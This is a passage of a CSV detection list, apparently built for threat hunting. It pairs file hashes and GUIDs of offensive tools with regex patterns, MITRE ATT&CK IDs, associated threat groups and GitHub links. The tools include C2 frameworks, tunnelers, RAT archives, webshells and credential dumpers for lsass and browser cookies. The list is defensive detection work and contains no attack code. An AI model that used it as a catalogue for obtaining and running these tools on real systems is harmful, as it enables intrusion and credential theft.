TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","23395" "*2532d6935c32487a273e2f360f73df80c2a9f57620c865d8cc10b9ccf7a9d629*",".{0,1000}2532d6935c32487a273e2f360f73df80c2a9f57620c865d8cc10b9ccf7a9d629.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23398" "*253e716a-ab96-4f87-88c7-052231ec2a12*",".{0,1000}253e716a\-ab96\-4f87\-88c7\-052231ec2a12.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","0","#GUIDproject","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","23402" "*2542be74ac14867b90e932f20690900db2c7671d40bac87af91ce7abe341ce54*",".{0,1000}2542be74ac14867b90e932f20690900db2c7671d40bac87af91ce7abe341ce54.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23403" "*25434c766654b893ce3271e2e05e256ca7a165286db3388f7f64f819d70b95ad*",".{0,1000}25434c766654b893ce3271e2e05e256ca7a165286db3388f7f64f819d70b95ad.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23405" "*254389e27339fd66920dd72f3ad07fe2e220f6b0cbea8032cf0b1d8285a7b098*",".{0,1000}254389e27339fd66920dd72f3ad07fe2e220f6b0cbea8032cf0b1d8285a7b098.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","#filehash","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","23406" "*2545de06f2ac30aa79cbeedc5f952c2884506e2d82e0f70c640331d9a07da522*",".{0,1000}2545de06f2ac30aa79cbeedc5f952c2884506e2d82e0f70c640331d9a07da522.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23407" "*25472451c57629aa2b0134cb123861d3b115a60fc0a7fbe320d9aa175afa887d*",".{0,1000}25472451c57629aa2b0134cb123861d3b115a60fc0a7fbe320d9aa175afa887d.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23408" 
"*254cf55fb776afbcf5ff93f9647303be1f8bee48bcb78f138881e4dc17c34b81*",".{0,1000}254cf55fb776afbcf5ff93f9647303be1f8bee48bcb78f138881e4dc17c34b81.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23411" "*25522ee1d92c2a6fb9d9dfa01c00ed08b9430cc573c9c4e4a829a1f0cb1670d7*",".{0,1000}25522ee1d92c2a6fb9d9dfa01c00ed08b9430cc573c9c4e4a829a1f0cb1670d7.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. 
attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#filehash","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","23413" "*2553a72abc7f19fbd345e3e85fd73aa883d062e893ed4f7b47ffd7648c16a063*",".{0,1000}2553a72abc7f19fbd345e3e85fd73aa883d062e893ed4f7b47ffd7648c16a063.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23414" "*2555b58b1d822f73a540ad15f6d6b8a7105f66a7c00233bdd1c03c4b8cc85824*",".{0,1000}2555b58b1d822f73a540ad15f6d6b8a7105f66a7c00233bdd1c03c4b8cc85824.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","23415" "*25564409a011c563e9623b376593512115515704a5ed932dd18c20a040c8640c*",".{0,1000}25564409a011c563e9623b376593512115515704a5ed932dd18c20a040c8640c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23416" 
"*2557d33f3a8599158820c409813b53a521cb3d0993352cd45b75f80eecd33f07*",".{0,1000}2557d33f3a8599158820c409813b53a521cb3d0993352cd45b75f80eecd33f07.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","23417" "*2562c158d4f10ab67c20710da74463876e093473b56e7e1900a163133c1765b5*",".{0,1000}2562c158d4f10ab67c20710da74463876e093473b56e7e1900a163133c1765b5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23418" "*2565fc215dd2846177ef9395dfd628b8a99447b4ab83b31eb2c67ca881c3084d*",".{0,1000}2565fc215dd2846177ef9395dfd628b8a99447b4ab83b31eb2c67ca881c3084d.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - 
TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","23419" "*2566C66F43F181F2B8AEFE41D902F02B54AE284B516062270E83F301A32A5F35*",".{0,1000}2566C66F43F181F2B8AEFE41D902F02B54AE284B516062270E83F301A32A5F35.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","23420" "*256b5d779bd052ffe4b332efca0a009614cd4fa935aef4c5e54e9ddb391b0d04*",".{0,1000}256b5d779bd052ffe4b332efca0a009614cd4fa935aef4c5e54e9ddb391b0d04.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23422" "*256f36a488c65848339cf910cdd4224dfc5a95b504e80ac46e003a7c8cd186f6*",".{0,1000}256f36a488c65848339cf910cdd4224dfc5a95b504e80ac46e003a7c8cd186f6.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","23423" "*25753582733a48c95a3f179afe3d54e65fcec6a7283a94fcd33f18808ddef166*",".{0,1000}25753582733a48c95a3f179afe3d54e65fcec6a7283a94fcd33f18808ddef166.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23425" "*257669b9f912f7e9176cc50844b641c13f37428237cdd4336e497e148158d5ff*",".{0,1000}257669b9f912f7e9176cc50844b641c13f37428237cdd4336e497e148158d5ff.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","23426" "*257cfcdd6311f8c05091d2215e6d0be3bc628f2f34b69668aed74a331fc099c5*",".{0,1000}257cfcdd6311f8c05091d2215e6d0be3bc628f2f34b69668aed74a331fc099c5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23428" "*25810493e3a4bd9076cdcdd14f7c7a6e6c159098ab393dd10375690a37bd0125*",".{0,1000}25810493e3a4bd9076cdcdd14f7c7a6e6c159098ab393dd10375690a37bd0125.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 
- TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23429" "*25861c1cc31e530c5f8162e78585f40697c28164fd3c561d3d1a31442ee1ec17*",".{0,1000}25861c1cc31e530c5f8162e78585f40697c28164fd3c561d3d1a31442ee1ec17.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23430" "*25879dae8a91b9cb647c49ace109e948db08e6198565f167233a45fb14bfe5bb*",".{0,1000}25879dae8a91b9cb647c49ace109e948db08e6198565f167233a45fb14bfe5bb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23431" "*2589213f0c51583dcbaacbe0005e5908*",".{0,1000}2589213f0c51583dcbaacbe0005e5908.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","23432" "*259322fe4426ae2d44fd68942705f889a5f292aecdb164d4b92302c0eedd3f28*",".{0,1000}259322fe4426ae2d44fd68942705f889a5f292aecdb164d4b92302c0eedd3f28.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","23434" "*259c9c57a74382b07c0a630b3094489b3aca263504b4fda79d3c20027e2a74fa*",".{0,1000}259c9c57a74382b07c0a630b3094489b3aca263504b4fda79d3c20027e2a74fa.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23435" "*25a03e663d0f5d7212ecc343b491f4985a3592126df446f42fc09c445dc163dd*",".{0,1000}25a03e663d0f5d7212ecc343b491f4985a3592126df446f42fc09c445dc163dd.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23436" 
"*25a3a725cec379cb70766bcc8ba6a87dba12de35f73c5e0439e2673e6840dc9a*",".{0,1000}25a3a725cec379cb70766bcc8ba6a87dba12de35f73c5e0439e2673e6840dc9a.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23437" "*25a808d1b6cfd5fd3bc896730284b0329a78e1b9c889473ccd4be1eef873512c*",".{0,1000}25a808d1b6cfd5fd3bc896730284b0329a78e1b9c889473ccd4be1eef873512c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23438" "*25aac4494a46799c4755d9bda39314d628134ee58dd6f724ee905373c3600343*",".{0,1000}25aac4494a46799c4755d9bda39314d628134ee58dd6f724ee905373c3600343.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#filehash","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","23439" "*25c0d247d2a85d8372a542255d8ef45a41f6b43633b0a6869b62cab393490d81*",".{0,1000}25c0d247d2a85d8372a542255d8ef45a41f6b43633b0a6869b62cab393490d81.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23442" "*25cf89a0105c08084f05df75a9dcd1c239e3ec07cf5b36413c04d204393b3560*",".{0,1000}25cf89a0105c08084f05df75a9dcd1c239e3ec07cf5b36413c04d204393b3560.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","23444" "*25cfd3b1b9d859a36c478b14a65d8aff77ab6c7c68aefe80e9945aef62a14029*",".{0,1000}25cfd3b1b9d859a36c478b14a65d8aff77ab6c7c68aefe80e9945aef62a14029.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23445" "*25d4635f8b5fea969f8c93a459f6fd0b0e333150254df3fc8963a7d19dd9a754*",".{0,1000}25d4635f8b5fea969f8c93a459f6fd0b0e333150254df3fc8963a7d19dd9a754.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23446" "*25d74d144c6c9bfd48b8746e20868ac4d699d4514baa136e53ee5f60ed02b962*",".{0,1000}25d74d144c6c9bfd48b8746e20868ac4d699d4514baa136e53ee5f60ed02b962.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23447" "*25d89bd7da43e326b9bfadeae2c256cf1f06c8522b475d43baecf309b2fa6da7*",".{0,1000}25d89bd7da43e326b9bfadeae2c256cf1f06c8522b475d43baecf309b2fa6da7.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","23448" "*25dd4db0e48fdc0552e9be4c65e9ae2af7c25e0e63ce4dc08f3f6083d7d971bf*",".{0,1000}25dd4db0e48fdc0552e9be4c65e9ae2af7c25e0e63ce4dc08f3f6083d7d971bf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23450" "*25e71c952a1ac4aa6614d87ca964afffa3ea33a59ef779e66afe0748eccf1642*",".{0,1000}25e71c952a1ac4aa6614d87ca964afffa3ea33a59ef779e66afe0748eccf1642.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","23453" "*25ec3ba7a4464210dd357b8454807c4163e761a46ccaa4bdd0b6c77e6b065fa5*",".{0,1000}25ec3ba7a4464210dd357b8454807c4163e761a46ccaa4bdd0b6c77e6b065fa5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team 
framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23455" "*26048dbf252141d3db4df311c6d70188c91bf1e4d3bb8cd8870b373566562a1d*",".{0,1000}26048dbf252141d3db4df311c6d70188c91bf1e4d3bb8cd8870b373566562a1d.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","23457" "*26085f4768e13063e5dde27f0e313854ce91aa032a7b26d4f57ebc03a6628560*",".{0,1000}26085f4768e13063e5dde27f0e313854ce91aa032a7b26d4f57ebc03a6628560.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","0","#filehash","N/A","8","3","244","41","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z","23459" "*2609239cc8bc517f684285133622e8b11192fb456e2dc2937aa2c6c2379a9d38*",".{0,1000}2609239cc8bc517f684285133622e8b11192fb456e2dc2937aa2c6c2379a9d38.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 
COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","23460" "*2611455f4d60bc80f43cb13f480c6bee70497fffea48ed5c0b7d67e7fce33a52*",".{0,1000}2611455f4d60bc80f43cb13f480c6bee70497fffea48ed5c0b7d67e7fce33a52.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","23462" "*261a0287a47dd71f44a4494a5d563bd5aa673687f60744ecf559ecb817a7ac82*",".{0,1000}261a0287a47dd71f44a4494a5d563bd5aa673687f60744ecf559ecb817a7ac82.{0,1000}","offensive_tool_keyword","PowerUpSQL","NetSPI powershell modules to gather credentials","T1552.001 - T1555.004 - T1003","TA0006 - TA0009 - TA0010","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/NetSPI/Powershell-Modules","1","0","#filehash","N/A","10","2","168","101","2019-06-06T15:54:47Z","2014-02-28T21:24:21Z","23464" "*261a166e7f42a53510b2ee2faa1178302e3c83887dc138dc32415c77b22a1bd4*",".{0,1000}261a166e7f42a53510b2ee2faa1178302e3c83887dc138dc32415c77b22a1bd4.{0,1000}","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Discovery","https://github.com/LMGsec/o365creeper","1","0","#filehash","N/A","N/A","4","342","60","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z","23465" 